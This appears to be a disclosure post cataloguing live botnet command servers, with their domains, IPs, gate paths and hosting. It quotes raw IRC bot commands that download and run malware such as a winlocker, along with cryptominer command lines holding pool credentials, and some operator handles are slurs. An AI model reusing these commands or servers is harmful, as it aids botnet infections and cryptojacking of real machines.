Author: I_Post_Ur_Info

imgay.ddos.es (betabot http botnet hosted by Fastflux)

Server: imgay.ddos.es
Gate file: /h/order.php
Alternate domains: imgay.ddos.cat imgay.theswat.net
ddos.cat has been linked to botnets before.
Hosting infos:
;; QUESTION SECTION:
;imgay.ddos.es. IN A
;; ANSWER SECTION:
imgay.ddos.es. 149 IN A 94.27.87.58
imgay.ddos.es. 149 IN A 98.195.89.225
imgay.ddos.es. 149 IN A 174.112.126.155
imgay.ddos.es. 149 IN A 176.40.77.176
imgay.ddos.es. 149 IN A 178.150.207.252
imgay.ddos.es. 149 IN

wrightfeldhusen.info (Betabot http botnet hosted by staminus.net)

Resolved wrightfeldhusen.info to 69.197.35.109
Server: wrightfeldhusen.info
Gate file: /beta/order.php
Alternate domains: akwebdesigner.info websachee.info tincorporated.info thetwenty.info swedishseasons.info lommebags.info andywilsonfs.info ghostgames1.info futureofwebdesign.info vdezignstudio.info waterworks2.info waterworks2.com nordkupp1.info circusbum.info novflex.info
This is hosted on the same server as this andromeda bot.
Hosting infos: http://whois.domaintools.com/69.197.35.109

www.panel-gc.co.uk (Andromeda http botnet hosted by staminus.net)

Resolved www.panel-gc.co.uk to 69.197.35.109
Server: www.panel-gc.co.uk
Gate file: /panel/gate.php
Plugins:
hxxp://www.panel-gc.co.uk/panel/fg_00eaffaa.mod
hxxp://www.panel-gc.co.uk/panel/rk_242fc383.mod
hxxp://www.panel-gc.co.uk/panel/s4_1829dbd8.mod
This is andromeda 2.7, not the older cracked version.
Bitcoin mining info: -o http://us1.eclipsemc.com:8337 -u Jackpont_1 -p gizmooclad971 -k diablo
Hosting infos: http://whois.domaintools.com/69.197.35.109

srv5.su (snk asper mod irc botnet hosted by softronics.ch)

Resolved srv5.su to 94.242.198.64
Server: srv5.su
Port: 5050
Channel: #ok
#ok :.j #spr .j #lock .j #spam #ok :.d p /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/114/105/119/81/50/105/98/117/
Downloads hxxp://94.242.198.64/4/smart.exe
Channel: #spr
#spr :.d x /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/127/111/122/100/11/121/116/127/
Downloads hxxp://94.242.198.64/4/spra.exe
Channel: #lock
#lock :.d l /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/96/112/107/110/11/121/116/127/
Downloads hxxp://94.242.198.64/4/lock.exe (winlocker)
Channel: #spam
#spam :.s.a /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/111/119/109/102/78/50/105/98/117/ /100/97/111/124/49/59/47/49/63/38/38/23/37/49/49/41/42/46/40/37/47/36/57/57/48/ 49 meeisodf
Alternate domain: srv50.su
Hosting infos: http://whois.domaintools.com/94.242.198.64

guard4you.info (Betabot http botnet hosted by ecatel.net)

Resolved guard4you.info to 80.82.66.26
Server: guard4you.info
Gate file: /customer/order.php
Alternate domains: nexusguardian.info vote4us.info meet2n8.info
This is the same idiot as this previous betabot. After three of the free domains he used were suspended due to reports (lol), he decided to try again with paid domains. He’s upgraded to four .info domains registered at namecheap, probably all

208.89.209.54 (Irc botnet hosted by virpus.com)

Server: 208.89.209.54
Port: 6667
Current global users 77, max 695
Channels:
#goon 3
#aryan 39 #OFFLINE
#flood 1
##yBz## 15
##Offline## 19
Aryan bots:
Channel: #aryan
Topic for #aryan is: #OFFLINE
Topic for #aryan set by formality at Sun May 05 16:23:03 2013
Linux bots:
Channel: ##Offline##
Channel: ##yBz##
Hosting infos: http://whois.domaintools.com/208.89.209.54

betabros.in (Several http botnets hosted by hostkey.ru)

Resolved betabros.in to 146.0.78.4
Server: betabros.in
Gate file: /beta/order.php
The owner should keep a closer eye on the fake forum he set up for cover. 1071 pages of pharmacy spam and counting.
Hosting infos: http://whois.domaintools.com/146.0.78.4
EDIT: Bitcoin and litecoin mining.
macromedia.exe -a scrypt -o http://us.litecoinpool.org:9332 -u marvid.disfig -p x
shell.exe -o stratum+tcp://stratum.btcguild.com:3333 -u vapor_3 -p x

jkdef8.ws (Betabot http botnet hosted by ecatel.net)

Resolved jkdef8.ws to 94.102.51.117
Server: jkdef8.ws
Gate file: /papka/order.php
Alternate domains (currently unregistered): jkdef6.ws jkdef7.ws jkdef10.ws jkdef11.ws jkdef12.ws jkdef13.ws jkdef14.ws jkdef15.ws jkdef16.ws jkdef17.ws jkdef18.ws jkdef19.ws jkdef20.ws jkdef21.ws jkdef22.ws
Bitcoin mining info: http://pooledbits.com:8337 -u nigfinity.1 -p x
Hosting infos: http://whois.domaintools.com/94.102.51.117